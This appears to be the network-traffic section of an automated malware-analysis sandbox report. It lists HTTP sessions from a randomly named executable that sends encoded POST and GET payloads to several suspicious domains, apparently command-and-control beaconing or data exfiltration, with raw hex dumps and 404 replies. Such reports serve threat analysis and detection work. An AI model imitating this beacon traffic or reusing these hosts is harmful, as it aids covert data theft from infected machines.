                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.55864889.58.49.180728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:30:04.109462023 CEST1779OUTPOST /xcfw/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.freepicture.online
                              Origin: http://www.freepicture.online
                              Referer: http://www.freepicture.online/xcfw/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2b 6a 53 70 39 30 77 37 5a 31 64 36 72 71 6d 31 34 35 56 6c 4d 72 42 4a 79 53 64 30 33 47 51 2f 48 6a 62 4d 32 6c 51 44 30 34 63 63 37 4b 6d 30 5a 4c 2f 47 47 58 76 6d 49 53 71 49 4b 42 31 39 74 43 6f 36 56 79 52 70 69 69 2f 46 42 64 35 4d 66 74 4c 62 6d 69 66 4d 46 43 78 48 33 61 6c 46 69 33 55 34 65 47 55 52 77 41 77 4a 38 68 48 5a 54 31 4b 2f 31 49 51 56 58 65 55 6c 6a 4e 2b 44 49 56 34 58 61 6e 52 6e 52 72 58 6e 71 49 78 64 55 6e 6a 56 6a 61 44 52 6e 44 77 63 2b 48 65 4f 6b 38 4a 50 79 68 52 42 39 72 36 6e 42 67 57 33 4e 2f 47 52 7a 38 47 44 39 42 79 78 6b 79 6c 30 63 31 63 47 65 37 6a 71 5a 6e 45 72 6f 6a 56 63 43 67 79 44 65 4c 71 57 34 4d 36 79 2b 70 34 34 52 51 4a 63 33 31 6a 65 4e 4c 38 54 72 79 4c 76 35 31 6b 6f 78 50 62 51 66 4c 6f 73 5a 7a 32 68 72 37 4c 55 5a 4a 54 68 55 4c 4e 43 49 41 34 48 59 6b 75 48 45 34 41 6e 2f 4d 33 36 55 56 61 69 61 58 4a 2b 62 70 65 4a 49 37 6d 38 78 39 76 43 4f 45 4e 34 45 4f 36 6e 51 75 46 77 6e 4f 32 43 41 42 6b [TRUNCATED]
                              Data Ascii: bX=Wh+VGNuLBIYa+jSp90w7Z1d6rqm145VlMrBJySd03GQ/HjbM2lQD04cc7Km0ZL/GGXvmISqIKB19tCo6VyRpii/FBd5MftLbmifMFCxH3alFi3U4eGURwAwJ8hHZT1K/1IQVXeUljN+DIV4XanRnRrXnqIxdUnjVjaDRnDwc+HeOk8JPyhRB9r6nBgW3N/GRz8GD9Byxkyl0c1cGe7jqZnErojVcCgyDeLqW4M6y+p44RQJc31jeNL8TryLv51koxPbQfLosZz2hr7LUZJThULNCIA4HYkuHE4An/M36UVaiaXJ+bpeJI7m8x9vCOEN4EO6nQuFwnO2CABka0dAYbWa8TXvCpGx28ua43RY2bc4WhMOHZXeDqXFiBUbRODahwCN34K+hxYcFmLUPii0pJTHQVsLfiRFq6gi7CLrMD0CLnt1cNulbG0h7AKIA+iPYhymTWcaDpMHl1elbnHpIC+6exNj2O3gw7F1moDwlzt0AGg5S4PxNU1GeBC8OeJ58Uf9a2PU9wrncY85OkxPfkDueg2vFKwbRVU/PDl6FnZcVjkQ8MU0PfCSzCSh1F2H6Dtx47fop1vbtCfVpuY+94l2rRp7t65lje1FmhbDdhALR0I/3ILNd9t/b/5IQiyPj46B+FkOscJV3HvmMYeRZ9TfRoNknS5ywH7cu/Sd4QfErTcvLri/Wh6JVyPv0QG43hU165ulJjW6tGxUIeKleKwtn+M++BBa2ZfonknpBuImQtSYRoo4m7qM0LrdL/KJTYjnalVfnPtt4micvP+3KXWuyQuIFqMRkHxT/3+XFMdlpx26dFoJ+xUTIG7Ou8O5ichg+Xrkl5x5En9VFTU5W+L9xsmlUIy6nmuTWpKEHRE+esCwxeewQa6MUZ1OmlTzobwSDYoTi2AU4K+D/CukU8aEJZJWDVTjTsDxHMfV1Kr0q9y14gjoZYgEafOvZBP/bGSAK9K5FGwA+Ca46R1IKwjbbnoHJMBu3VmUrbYicHN+Wc+F/M [TRUNCATED]
                              Sep 16, 2024 09:30:04.733069897 CEST360INHTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:30:04 GMT
                              Server: Apache
                              Content-Length: 196
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.55864989.58.49.180728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:30:06.738957882 CEST468OUTGET /xcfw/?bX=bjW1F6zberoR1D3bw3FdYWJ+vrSF97RpHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFA2CDhFv5wQZ64tx6dBz0c4KNQxRUIYxJE7HIG/DzEWEHYrw==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.freepicture.online
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:30:07.474097967 CEST360INHTTP/1.1 404 Not Found
                              Date: Mon, 16 Sep 2024 07:30:07 GMT
                              Server: Apache
                              Content-Length: 196
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.558650154.23.184.24080728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:30:20.836724997 CEST715OUTPOST /p39s/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.hm62t.top
                              Origin: http://www.hm62t.top
                              Referer: http://www.hm62t.top/p39s/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 63 6f 68 45 76 31 4f 2f 71 41 6a 66 4d 41 59 76 34 57 39 52 38 6c 53 70 4a 62 74 48 72 59 61 35 76 64 67 46 76 32 64 48 49 5a 33 4f 77 33 54 4c 45 2f 54 41 41 76 70 50 4c 2f 47 49 41 38 34 30 4f 36 76 71 38 73 30 73 62 4e 44 34 6a 7a 33 48 51 43 65 66 61 54 32 6a 32 33 67 5a 67 66 79 79 50 7a 63 59 56 6c 48 48 4b 69 47 76 52 62 39 4b 6f 5a 61 56 4c 45 4f 4a 43 4f 64 4c 32 76 2b 35 49 56 61 39 69 50 52 55 72 54 74 76 5a 7a 72 56 61 35 52 4d 64 79 6b 52 66 7a 4e 76 72 2f 46 56 75 48 41 54 63 7a 73 6b 46 79 41 45 54 57 67 78 7a 4c 68 62 35 46 69 2f 37 63 3d
                              Data Ascii: bX=4PVtP2BQg8qzhcohEv1O/qAjfMAYv4W9R8lSpJbtHrYa5vdgFv2dHIZ3Ow3TLE/TAAvpPL/GIA840O6vq8s0sbND4jz3HQCefaT2j23gZgfyyPzcYVlHHKiGvRb9KoZaVLEOJCOdL2v+5IVa9iPRUrTtvZzrVa5RMdykRfzNvr/FVuHATczskFyAETWgxzLhb5Fi/7c=
                              Sep 16, 2024 09:30:21.735294104 CEST312INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:30:21 GMT
                              Content-Type: text/html
                              Content-Length: 148
                              Connection: close
                              ETag: "66a8e223-94"
                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.558651154.23.184.24080728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:30:23.650276899 CEST735OUTPOST /p39s/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.hm62t.top
                              Origin: http://www.hm62t.top
                              Referer: http://www.hm62t.top/p39s/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 38 34 68 44 4e 64 4f 33 71 41 6b 61 4d 41 59 6d 59 57 35 52 37 74 53 70 49 50 44 48 65 41 61 35 4e 56 67 45 74 65 64 47 49 5a 33 46 51 33 53 47 6b 2f 45 41 41 69 55 50 4b 54 47 49 41 6f 34 30 50 4b 76 72 50 45 31 74 4c 4e 42 30 44 7a 31 4a 77 43 65 66 61 54 32 6a 32 53 46 5a 67 58 79 79 66 6a 63 65 78 78 47 45 4b 69 48 6d 78 62 39 64 34 5a 57 56 4c 45 6f 4a 42 4b 6e 4c 31 58 2b 35 4e 35 61 7a 54 50 53 64 72 54 72 78 70 79 58 57 61 73 4f 41 2b 2b 62 65 70 43 51 38 61 54 62 51 59 71 71 4a 2b 37 45 33 6c 65 34 55 41 65 58 67 44 71 49 42 61 56 53 68 73 4b 62 61 34 45 70 50 42 69 56 62 72 35 67 6e 76 65 64 76 48 62 48
                              Data Ascii: bX=4PVtP2BQg8qzh84hDNdO3qAkaMAYmYW5R7tSpIPDHeAa5NVgEtedGIZ3FQ3SGk/EAAiUPKTGIAo40PKvrPE1tLNB0Dz1JwCefaT2j2SFZgXyyfjcexxGEKiHmxb9d4ZWVLEoJBKnL1X+5N5azTPSdrTrxpyXWasOA++bepCQ8aTbQYqqJ+7E3le4UAeXgDqIBaVShsKba4EpPBiVbr5gnvedvHbH
                              Sep 16, 2024 09:30:24.552614927 CEST312INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:30:24 GMT
                              Content-Type: text/html
                              Content-Length: 148
                              Connection: close
                              ETag: "66a8e223-94"
                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.558652154.23.184.24080728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:30:26.199429035 CEST1752OUTPOST /p39s/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.hm62t.top
                              Origin: http://www.hm62t.top
                              Referer: http://www.hm62t.top/p39s/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 38 34 68 44 4e 64 4f 33 71 41 6b 61 4d 41 59 6d 59 57 35 52 37 74 53 70 49 50 44 48 64 67 61 35 2b 4e 67 47 4d 65 64 55 59 5a 33 47 51 33 50 47 6b 2f 5a 41 44 54 54 50 4b 50 57 49 43 51 34 33 74 79 76 69 61 77 31 6b 4c 4e 42 70 54 7a 34 48 51 43 4c 66 61 69 2b 6a 32 69 46 5a 67 58 79 79 61 6e 63 64 6c 6c 47 49 71 69 47 76 52 61 38 4b 6f 59 2f 56 4c 64 54 4a 41 2f 59 49 46 33 2b 36 74 70 61 78 6c 62 53 53 72 54 70 77 70 79 50 57 61 77 72 41 2b 6a 71 65 74 4b 36 38 5a 7a 62 54 70 76 4c 54 4b 4b 62 68 32 53 44 62 44 53 57 79 43 66 71 4a 70 78 4b 73 4f 47 4c 66 72 51 30 4d 31 69 48 65 70 59 4e 6c 4a 69 76 67 44 69 66 4e 47 55 2b 50 54 6b 55 63 32 61 53 31 4a 4f 49 6f 6a 66 67 4e 65 4f 47 65 39 4e 57 43 6a 66 6e 57 6f 6b 6c 50 53 70 46 6d 6e 6d 6d 76 48 66 4a 53 54 34 54 6c 39 58 33 53 4e 53 46 38 30 59 72 68 53 47 7a 33 55 37 2b 35 32 54 79 57 38 33 31 47 5a 47 71 6d 39 74 77 79 6e 32 6a 34 46 7a 31 37 31 2f 31 6d 61 78 63 4c 79 30 72 4d 44 66 4b 44 5a 2b [TRUNCATED]
                              Data Ascii: bX=4PVtP2BQg8qzh84hDNdO3qAkaMAYmYW5R7tSpIPDHdga5+NgGMedUYZ3GQ3PGk/ZADTTPKPWICQ43tyviaw1kLNBpTz4HQCLfai+j2iFZgXyyancdllGIqiGvRa8KoY/VLdTJA/YIF3+6tpaxlbSSrTpwpyPWawrA+jqetK68ZzbTpvLTKKbh2SDbDSWyCfqJpxKsOGLfrQ0M1iHepYNlJivgDifNGU+PTkUc2aS1JOIojfgNeOGe9NWCjfnWoklPSpFmnmmvHfJST4Tl9X3SNSF80YrhSGz3U7+52TyW831GZGqm9twyn2j4Fz171/1maxcLy0rMDfKDZ+pWTDr6LnrlNbxPOPrBRdTCBzpxfL5akqaMCxXfoeOSKURGywt0+G2Vv0BU9pJQ8QiUw/ouZq2m79t9hJO4g71cnqwRxRjl7U4tufzTXDlg1XFRpF0svNr/sHnG8JAv8m80pxxr14Z13dbI2S9uEiKNbedl7IkF844rTO1PPRaBfzPu/nMjAR6nEWwDBSoABxuW6eQwUIeKMO2me9lVpAJXKWwErbTl8ZoWhwF5IkB6nZahgUKHDXA2xbm9smoO+cj6KNSmCFoYkTyxyWDeYn3Ux/dpQehm0lgsmMqriUq4p2I7dsPXPJA2nFix9cQNFbgungkg49mAaGXNEiuYKAu7WqsP6vkAs+1q0QPOXaZxeg3lIpWbP/RXPZsBusH3wVLn7N4xhGXU1xkmiiWdZr7nQSPZbCazM8RuiJhKpraQaqpd5qEgzwwTnQxI6ygFLN5s4ZwrocAw/ePMlud3m81VZPsRubrNQrdETwr1cXVvDavguY3HNYwonv4/f3uvGsBrZwaN/2MrAt5AXSbltIRFv/fRDxOeI1HmZFIRNO5LYKF0PyZxsEfajbJvfKJ+JqKK5JX6tgNUD6ivXHr7hV1NzM3Frn0/AMdCgRyglOuhDOoduD+6Q2HNDLynnDyT1bJawEZuieT+C/OPT9isJbgZxf1ibu4NyTcp [TRUNCATED]
                              Sep 16, 2024 09:30:27.097513914 CEST312INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:30:26 GMT
                              Content-Type: text/html
                              Content-Length: 148
                              Connection: close
                              ETag: "66a8e223-94"
                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.558653154.23.184.24080728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:30:28.745003939 CEST459OUTGET /p39s/?RFRd_=tFLD&bX=1N9NMDNpm9Czos0sMOBPjc8XecgVvOOrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV8zKUy6S3cHQGYd//xgFiAZgSqx5KudB9OKNvEpiaWMoszOg== HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.hm62t.top
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:30:29.659447908 CEST312INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:30:29 GMT
                              Content-Type: text/html
                              Content-Length: 148
                              Connection: close
                              ETag: "66a8e223-94"
                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.55865485.159.66.9380728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:30:34.790605068 CEST748OUTPOST /k2vl/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.golbasi-nakliyat.xyz
                              Origin: http://www.golbasi-nakliyat.xyz
                              Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 42 65 6c 6f 46 53 4d 61 56 2f 47 6e 32 48 4a 2b 75 6c 45 70 41 52 39 4e 61 78 32 4f 66 43 47 58 4f 6e 62 6d 6a 66 42 70 36 6e 37 6d 34 6a 79 79 4d 70 66 56 2f 63 71 37 48 76 2b 61 44 59 47 54 63 70 54 56 57 61 39 74 64 49 51 5a 59 76 46 63 30 79 55 69 33 4b 65 68 52 71 55 2f 34 7a 51 6e 55 43 35 76 4e 56 55 54 56 67 37 75 41 37 4d 33 45 54 56 56 43 74 42 6a 50 69 72 75 70 38 53 56 4c 6a 58 42 48 78 51 59 78 38 68 44 48 74 62 64 58 2b 35 5a 37 42 76 44 5a 53 64 32 38 44 59 31 62 41 32 70 54 33 2b 39 63 52 6d 33 57 78 6d 53 38 35 61 30 76 53 58 6d 4c 69 55 3d
                              Data Ascii: bX=ezGJx9beP/VwBeloFSMaV/Gn2HJ+ulEpAR9Nax2OfCGXOnbmjfBp6n7m4jyyMpfV/cq7Hv+aDYGTcpTVWa9tdIQZYvFc0yUi3KehRqU/4zQnUC5vNVUTVg7uA7M3ETVVCtBjPirup8SVLjXBHxQYx8hDHtbdX+5Z7BvDZSd28DY1bA2pT3+9cRm3WxmS85a0vSXmLiU=


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.2.55865585.159.66.9380728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:30:37.478934050 CEST768OUTPOST /k2vl/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.golbasi-nakliyat.xyz
                              Origin: http://www.golbasi-nakliyat.xyz
                              Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 41 2b 56 6f 48 31 59 61 41 76 47 67 36 6e 4a 2b 6b 46 45 74 41 57 31 4e 61 31 75 65 66 78 69 58 4e 46 44 6d 69 65 42 70 35 6e 37 6d 71 44 79 33 52 35 66 65 2f 63 32 7a 48 76 79 61 44 59 53 54 63 6f 50 56 57 70 6c 71 64 59 51 62 51 50 46 4e 77 79 55 69 33 4b 65 68 52 71 51 47 34 7a 59 6e 55 7a 4a 76 50 33 77 55 4c 51 37 78 4a 62 4d 33 4f 7a 56 52 43 74 41 32 50 6d 72 55 70 36 57 56 4c 69 6e 42 48 67 51 62 2b 38 68 46 61 39 61 35 61 63 30 48 2b 77 33 34 52 78 49 7a 6c 78 63 75 58 57 62 44 4a 56 32 56 50 78 4b 50 47 69 75 6c 74 4a 37 64 31 78 48 57 56 31 41 67 6e 39 7a 77 42 41 75 4e 51 59 42 78 33 45 58 43 75 57 4d 58
                              Data Ascii: bX=ezGJx9beP/VwA+VoH1YaAvGg6nJ+kFEtAW1Na1uefxiXNFDmieBp5n7mqDy3R5fe/c2zHvyaDYSTcoPVWplqdYQbQPFNwyUi3KehRqQG4zYnUzJvP3wULQ7xJbM3OzVRCtA2PmrUp6WVLinBHgQb+8hFa9a5ac0H+w34RxIzlxcuXWbDJV2VPxKPGiultJ7d1xHWV1Agn9zwBAuNQYBx3EXCuWMX


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              11192.168.2.55865685.159.66.9380728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:30:40.133606911 CEST1785OUTPOST /k2vl/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.golbasi-nakliyat.xyz
                              Origin: http://www.golbasi-nakliyat.xyz
                              Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
